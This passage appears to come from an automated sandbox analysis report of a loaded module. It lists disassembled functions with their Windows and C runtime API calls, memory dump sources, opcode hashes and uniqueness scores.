                                                                                                                                                                                                                                              • std::exception::exception.LIBCMT ref: 6CF32CC3
                                                                                                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 6CF32CDA
                                                                                                                                                                                                                                                • Part of subcall function 6CF39BB5: std::exception::exception.LIBCMT ref: 6CF39C04
                                                                                                                                                                                                                                                • Part of subcall function 6CF39BB5: std::exception::exception.LIBCMT ref: 6CF39C1E
                                                                                                                                                                                                                                                • Part of subcall function 6CF39BB5: __CxxThrowException@8.LIBCMT ref: 6CF39C2F
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Exception@8Throw$std::exception::exception$_malloc
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3942750879-0
                                                                                                                                                                                                                                              • Opcode ID: da7439ce14c764aa56ad19d9fa1d4e2ca6f0ce7661f9f7d91f9c246615b2a440
                                                                                                                                                                                                                                              • Instruction ID: 92740914d57b94b2c9c82ca2dc4334a7fde0322b9e42af404e5a9e770c8c4697
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: da7439ce14c764aa56ad19d9fa1d4e2ca6f0ce7661f9f7d91f9c246615b2a440
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A2416BB1518301AFC314CF59C480A8AFBF4FF99714F508A2EE19A87B91DB71A548CB92
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CEFC410 Relevance: 6.1, APIs: 4, Instructions: 112COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6CEFC478
                                                                                                                                                                                                                                              • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CEFC488
                                                                                                                                                                                                                                              • SafeArrayGetElement.OLEAUT32(?,00000001,?), ref: 6CEFC4B4
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFC512
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ArraySafe$Bound$DestroyElement
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3987547017-0
                                                                                                                                                                                                                                              • Opcode ID: 7d0693fdb90f6a35b8212f0db2cb9801415cc72075d4cf823c749d6a7d33f0c8
                                                                                                                                                                                                                                              • Instruction ID: b54a075e9b1a9951c6b17e75038e76ff87c856eb77ea652b127101f5e5ecea08
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7d0693fdb90f6a35b8212f0db2cb9801415cc72075d4cf823c749d6a7d33f0c8
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2C413471A0014AAFDB11DF98C880DEEBBB8FB49354F208559F929E7740D730AA46CB60
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CEFB580 Relevance: 6.1, APIs: 4, Instructions: 111COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • VariantInit.OLEAUT32(6CF502A0), ref: 6CEFB5D5
                                                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 6CEFB5E2
                                                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 6CEFB685
                                                                                                                                                                                                                                              • VariantClear.OLEAUT32(6CF502A0), ref: 6CEFB68B
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Variant$ClearInit
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2610073882-0
                                                                                                                                                                                                                                              • Opcode ID: 4fc05da63ae1de8ebe7c7ec7525c51a5b627060f7980c2703615fc0b61ca4162
                                                                                                                                                                                                                                              • Instruction ID: 9109f531fd050304ed79be0ba050de25c951019c0d5ac6ce9cb1e18277ca01f6
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4fc05da63ae1de8ebe7c7ec7525c51a5b627060f7980c2703615fc0b61ca4162
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3941B372A00209DFDB00DFA9C980B9AFBF9FF89314F218199E91497750D776E902CB90
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CF488C9 Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 6CF488FD
                                                                                                                                                                                                                                              • __isleadbyte_l.LIBCMT ref: 6CF48930
                                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?), ref: 6CF48961
                                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?), ref: 6CF489CF
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3058430110-0
                                                                                                                                                                                                                                              • Opcode ID: cedd179169e11b283c0763b3b229db8fa3940f19e05b3d1e82ee8f72582fe7f5
                                                                                                                                                                                                                                              • Instruction ID: 0d95df272f5c734da6df97eeca9a458b926bdcfdbae9107d4d6cb0331bb904f9
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cedd179169e11b283c0763b3b229db8fa3940f19e05b3d1e82ee8f72582fe7f5
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5431D531A05246EFDB01DF68C8809AE3FB4BF01314F14856AE564DB592E730D940DBD1
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CED5A30 Relevance: 6.1, APIs: 4, Instructions: 98COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 6CF39BB5: _malloc.LIBCMT ref: 6CF39BCF
                                                                                                                                                                                                                                              • std::exception::exception.LIBCMT ref: 6CED5ACB
                                                                                                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 6CED5AE0
                                                                                                                                                                                                                                              • std::exception::exception.LIBCMT ref: 6CED5B18
                                                                                                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 6CED5B2D
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Exception@8Throwstd::exception::exception$_malloc
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3153320871-0
                                                                                                                                                                                                                                              • Opcode ID: 3cb92e45d30ccb84a96b9c727935e8153627282d3d461683756b4125fd1e4959
                                                                                                                                                                                                                                              • Instruction ID: 44613c37ff91a4c38574c30109edbec722c84caf327f4ad075ed5fe3c113062a
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3cb92e45d30ccb84a96b9c727935e8153627282d3d461683756b4125fd1e4959
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1D3195B2910618ABCB10CF95D841ADAB7F8FF54744F10866EE81997B40EB30AA04CBE1
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CEE8470 Relevance: 6.1, APIs: 4, Instructions: 91COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 6CF39BB5: _malloc.LIBCMT ref: 6CF39BCF
                                                                                                                                                                                                                                              • InitializeCriticalSection.KERNEL32(00000000,00000000,6CEE5D89,00000000,00000004,00000000,?,00000000,00000000), ref: 6CEE84EA
                                                                                                                                                                                                                                              • InitializeCriticalSection.KERNEL32(00000018,?,00000000,00000000), ref: 6CEE84F0
                                                                                                                                                                                                                                              • std::exception::exception.LIBCMT ref: 6CEE853C
                                                                                                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 6CEE8551
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CriticalInitializeSection$Exception@8Throw_mallocstd::exception::exception
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3005353045-0
                                                                                                                                                                                                                                              • Opcode ID: dfd5f95c725505fa25b54229d0c97f250b12c8a627322964b50bff24625f7920
                                                                                                                                                                                                                                              • Instruction ID: 0abe5cc904447c94588c0f31f92e71ea3861310c7d882ebf8a255ccdc2f86ff8
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: dfd5f95c725505fa25b54229d0c97f250b12c8a627322964b50bff24625f7920
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F6314B71A01704AFCB54CF69C480A9AFBF4FF19214F508A6EE95687B41D771FA44CB90
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CEFDC40 Relevance: 6.1, APIs: 4, Instructions: 90COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • std::exception::exception.LIBCMT ref: 6CEFDCC5
                                                                                                                                                                                                                                                • Part of subcall function 6CF39533: std::exception::_Copy_str.LIBCMT ref: 6CF3954E
                                                                                                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 6CEFDCDA
                                                                                                                                                                                                                                                • Part of subcall function 6CF3AC75: RaiseException.KERNEL32(?,?,6CF39C34,FF0C5935,?,?,?,?,6CF39C34,FF0C5935,6CF69C90,6CF7B974,FF0C5935), ref: 6CF3ACB7
                                                                                                                                                                                                                                                • Part of subcall function 6CF39BB5: _malloc.LIBCMT ref: 6CF39BCF
                                                                                                                                                                                                                                              • std::exception::exception.LIBCMT ref: 6CEFDD09
                                                                                                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 6CEFDD1E
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Exception@8Throwstd::exception::exception$Copy_strExceptionRaise_mallocstd::exception::_
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 399550787-0
                                                                                                                                                                                                                                              • Opcode ID: 8c07c027b955350efd79365749221a0bf8edb116967f26e4ee0db68e6b050a14
                                                                                                                                                                                                                                              • Instruction ID: 20f877bf6d097d34fa6f3b78cd5a56988ba1a41991bc153f1ae5598ee665b6de
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8c07c027b955350efd79365749221a0bf8edb116967f26e4ee0db68e6b050a14
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 25317EB6900218AFCB04CF99D840A9EBBF8BF54304F1085ADE91997751DB70EB04CBA1
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CF42645 Relevance: 6.1, APIs: 4, Instructions: 68COMMONLIBRARYCODE
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • _malloc.LIBCMT ref: 6CF42653
                                                                                                                                                                                                                                                • Part of subcall function 6CF39D66: __FF_MSGBANNER.LIBCMT ref: 6CF39D7F
                                                                                                                                                                                                                                                • Part of subcall function 6CF39D66: __NMSG_WRITE.LIBCMT ref: 6CF39D86
                                                                                                                                                                                                                                                • Part of subcall function 6CF39D66: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,00000000,?,6CF39BD4,6CED1290,FF0C5935), ref: 6CF39DAB
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: AllocateHeap_malloc
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 501242067-0
                                                                                                                                                                                                                                              • Opcode ID: 5d18a645825f8508947a79ca2f6ed896fe942e7202d25e93e5c08ce699f95dff
                                                                                                                                                                                                                                              • Instruction ID: c4b929627c2e8f88763ae46a30d665a0a956fafdc3212562dad4bb7b911db0a2
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5d18a645825f8508947a79ca2f6ed896fe942e7202d25e93e5c08ce699f95dff
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C911C832915235BBCB211B75A80C78E3FB8AF42369B248135E94CD6E52DF32855087E4
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CEE7240 Relevance: 6.1, APIs: 4, Instructions: 67COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 6CF04410: _malloc.LIBCMT ref: 6CF0446E
                                                                                                                                                                                                                                              • SafeArrayCreateVector.OLEAUT32(00000011,00000000,?), ref: 6CEE7287
                                                                                                                                                                                                                                              • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 6CEE729B
                                                                                                                                                                                                                                              • _memmove.LIBCMT ref: 6CEE72AF
                                                                                                                                                                                                                                              • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 6CEE72B8
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ArraySafe$Data$AccessCreateUnaccessVector_malloc_memmove
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 583974297-0
                                                                                                                                                                                                                                              • Opcode ID: 4a5a16ee9588d4a9dba3e82652c5014d23024149d9fec52c1ca340c994b35a87
                                                                                                                                                                                                                                              • Instruction ID: 0ead9eecb80c21be54f08bb5c04e161301f71608af8eda112d1a52dfbca730ef
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4a5a16ee9588d4a9dba3e82652c5014d23024149d9fec52c1ca340c994b35a87
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 511186B6A10118BBCB04CF95DC80DDFBB7CDFDD694B118269F90497601DA709A05CBE0
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CEF5A70 Relevance: 6.1, APIs: 4, Instructions: 65COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 6CEF5AB9
                                                                                                                                                                                                                                              • VariantCopy.OLEAUT32(?,6CF69C90), ref: 6CEF5AC1
                                                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 6CEF5AE2
                                                                                                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 6CEF5AEF
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
